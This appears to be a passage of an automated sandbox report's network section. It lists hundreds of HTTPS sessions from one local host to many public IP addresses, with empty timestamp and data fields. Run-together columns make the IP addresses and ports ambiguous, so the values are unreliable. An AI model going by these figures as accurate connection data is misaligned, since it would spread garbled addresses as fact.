                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18301192.168.2.145268848.185.55.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18302192.168.2.1437254188.56.36.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18303192.168.2.143587668.50.245.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18304192.168.2.1454718200.254.206.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18305192.168.2.1433906105.118.130.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18306192.168.2.1433444141.126.244.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18307192.168.2.1455286130.68.237.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18308192.168.2.1433058146.56.99.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18309192.168.2.1445528162.124.64.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18310192.168.2.144857427.231.154.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18311192.168.2.1451412155.212.70.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18312192.168.2.1433622181.2.116.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18313192.168.2.1437384123.53.189.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18314192.168.2.144432254.118.79.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18315192.168.2.1442950186.28.133.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18316192.168.2.143982896.111.51.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18317192.168.2.14485605.138.197.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18318192.168.2.145997277.81.50.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18319192.168.2.1460964100.188.139.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18320192.168.2.1460490213.26.239.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18321192.168.2.1458580192.39.153.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18322192.168.2.1459612184.161.52.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18323192.168.2.1433040219.187.38.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18324192.168.2.145577485.243.33.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18325192.168.2.1445632131.255.166.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18326192.168.2.1445956187.178.3.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18327192.168.2.1440016197.70.105.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18328192.168.2.1442398136.152.245.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18329192.168.2.1434428173.242.86.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18330192.168.2.144482474.216.217.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18331192.168.2.1449466136.42.99.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18332192.168.2.1458714115.206.171.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18333192.168.2.1459112126.86.9.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18334192.168.2.144932657.144.179.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18335192.168.2.146051873.166.6.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18336192.168.2.145398490.5.150.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18337192.168.2.1449586124.17.5.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18338192.168.2.1451762200.6.164.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18339192.168.2.1450802168.24.80.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18340192.168.2.1446392134.90.151.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18341192.168.2.144929284.76.76.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18342192.168.2.1439544125.137.103.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18343192.168.2.1459462142.179.107.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18344192.168.2.1451672105.179.156.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18345192.168.2.14355365.215.83.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18346192.168.2.143894442.67.42.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18347192.168.2.1448474191.110.197.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18348192.168.2.1436092177.201.117.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18349192.168.2.1437574107.78.205.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18350192.168.2.1440916104.61.164.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18351192.168.2.144623239.142.196.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18352192.168.2.1441132213.41.246.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18353192.168.2.1449048153.68.181.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18354192.168.2.145971263.54.189.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18355192.168.2.143319054.167.220.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18356192.168.2.144897614.76.156.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18357192.168.2.1451742193.23.224.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18358192.168.2.145421234.140.249.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18359192.168.2.1444624114.13.104.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18360192.168.2.1455366195.185.248.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18361192.168.2.1460380177.130.236.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18362192.168.2.1453924156.131.135.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18363192.168.2.143367466.248.242.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18364192.168.2.145590682.153.132.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18365192.168.2.14390125.16.246.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18366192.168.2.144263484.65.31.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18367192.168.2.145108224.156.173.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18368192.168.2.143799267.141.187.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18369192.168.2.144698070.201.214.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18370192.168.2.1441612205.77.55.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18371192.168.2.146017239.133.234.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18372192.168.2.1457656188.159.101.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18373192.168.2.1451342162.236.112.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18374192.168.2.1448246147.116.96.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18375192.168.2.1452946121.104.184.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18376192.168.2.1433806185.163.5.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18377192.168.2.1434168166.107.132.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18378192.168.2.1445736173.44.216.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18379192.168.2.1452708150.150.118.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18380192.168.2.1452270210.197.123.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18381192.168.2.144731074.55.11.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18382192.168.2.1436852155.115.221.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18383192.168.2.145829639.63.65.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18384192.168.2.144224634.49.21.188080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18385192.168.2.1435834117.38.8.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18386192.168.2.143854876.98.28.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18387192.168.2.144240047.52.191.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18388192.168.2.1444536221.122.79.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18389192.168.2.144032283.43.165.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18390192.168.2.1436866206.26.158.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18391192.168.2.1453220195.122.173.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18392192.168.2.144037020.221.67.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18393192.168.2.1456748222.12.216.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18394192.168.2.1435794129.114.6.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18395192.168.2.144179838.117.142.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18396192.168.2.1457530162.251.80.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18397192.168.2.1446212145.96.65.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18398192.168.2.143794082.74.195.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18399192.168.2.1451386144.10.152.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18400192.168.2.14351764.162.117.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18401192.168.2.1432908201.45.221.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18402192.168.2.14559449.224.245.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18403192.168.2.1459184132.200.122.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18404192.168.2.145844645.167.104.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18405192.168.2.1444908101.154.236.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18406192.168.2.143675686.70.197.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18407192.168.2.144179267.233.105.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18408192.168.2.145216239.219.71.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18409192.168.2.144566670.140.34.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18410192.168.2.1433200103.230.87.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18411192.168.2.1433506177.171.15.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18412192.168.2.1446030169.228.58.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18413192.168.2.14447128.97.203.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18414192.168.2.145957467.21.157.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18415192.168.2.1439568148.218.254.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18416192.168.2.1459504132.255.255.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18417192.168.2.1434608193.16.72.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18418192.168.2.1445656206.43.141.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18419192.168.2.144171287.162.36.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18420192.168.2.1457826115.15.242.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18421192.168.2.1458776163.98.26.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18422192.168.2.1437404218.200.39.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18423192.168.2.1441672128.69.42.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18424192.168.2.145521081.110.57.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18425192.168.2.1433648164.199.247.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18426192.168.2.1443868148.27.192.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18427192.168.2.1451930184.122.15.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18428192.168.2.143545090.5.236.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18429192.168.2.145766019.161.101.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18430192.168.2.144327696.144.108.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18431192.168.2.1442932172.64.28.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18432192.168.2.144508852.3.127.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18433192.168.2.144799454.154.246.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18434192.168.2.144884680.240.236.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18435192.168.2.1444372208.171.74.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18436192.168.2.1459084210.240.253.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18437192.168.2.1451432216.212.163.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18438192.168.2.1458388197.193.244.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18439192.168.2.1436472107.123.156.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18440192.168.2.143881237.54.86.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18441192.168.2.145260490.28.123.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18442192.168.2.144512423.156.32.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18443192.168.2.1444008204.115.163.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18444192.168.2.1440202106.43.180.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18445192.168.2.1449614164.164.180.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18446192.168.2.1457026108.6.216.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18447192.168.2.145606462.47.223.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18448192.168.2.1444098151.105.10.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18449192.168.2.146082061.247.3.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18450192.168.2.1454496103.219.121.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18451192.168.2.146083683.142.223.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18452192.168.2.1446478223.50.158.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18453192.168.2.144813471.224.59.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18454192.168.2.145409299.230.69.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18455192.168.2.1454912143.161.240.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18456192.168.2.143852078.139.136.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18457192.168.2.1436938126.141.51.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18458192.168.2.1447410211.138.220.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18459192.168.2.145004649.15.52.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18460192.168.2.1453380194.18.39.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18461192.168.2.1446526146.239.107.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18462192.168.2.144991485.252.63.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18463192.168.2.1440864197.196.246.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18464192.168.2.1433634211.10.229.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18465192.168.2.1444216181.99.251.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18466192.168.2.1434856153.58.111.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18467192.168.2.145645641.134.74.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18468192.168.2.143631464.76.71.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18469192.168.2.1443246140.38.244.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18470192.168.2.1442942136.7.66.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18471192.168.2.1442854118.98.198.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18472192.168.2.14421149.241.174.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18473192.168.2.1441712178.126.241.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18474192.168.2.144304680.73.2.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18475192.168.2.1436526122.131.16.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18476192.168.2.1437278172.86.218.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18477192.168.2.1451620131.107.189.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18478192.168.2.1445174133.8.65.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18479192.168.2.143469844.74.76.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18480192.168.2.1452524200.240.253.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18481192.168.2.1449822107.238.203.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18482192.168.2.1445300167.207.1.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18483192.168.2.144477272.205.137.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18484192.168.2.1440492188.217.203.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18485192.168.2.144293669.38.203.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18486192.168.2.1455078205.44.82.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18487192.168.2.145908078.0.217.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18488192.168.2.1449650105.219.68.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18489192.168.2.145983652.101.8.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18490192.168.2.1455872210.50.252.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18491192.168.2.1450734162.231.227.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18492192.168.2.1449954198.65.235.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18493192.168.2.144363099.120.211.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18494192.168.2.1452162125.14.195.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18495192.168.2.1432892117.63.112.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18496192.168.2.145039099.149.240.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18497192.168.2.144448884.135.218.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18498192.168.2.1453828143.221.242.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18499192.168.2.145081685.33.35.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18500192.168.2.1453216137.17.230.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18501192.168.2.143847278.164.176.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18502192.168.2.1460448120.55.246.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18503192.168.2.1446736119.230.202.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18504192.168.2.1437440118.105.106.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18505192.168.2.1438672195.165.192.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18506192.168.2.144613271.175.77.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18507192.168.2.1444962157.151.239.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18508192.168.2.1437540211.2.67.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18509192.168.2.144103823.64.54.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18510192.168.2.145536651.50.11.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18511192.168.2.1453350159.62.118.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18512192.168.2.143841895.196.64.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18513192.168.2.14488142.147.39.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18514192.168.2.143733076.186.222.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18515192.168.2.143485266.47.155.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18516192.168.2.1442478205.14.0.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18517192.168.2.144205646.14.214.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18518192.168.2.1449958155.208.103.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18519192.168.2.143740237.175.190.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18520192.168.2.145054076.255.3.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18521192.168.2.1441838130.22.166.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
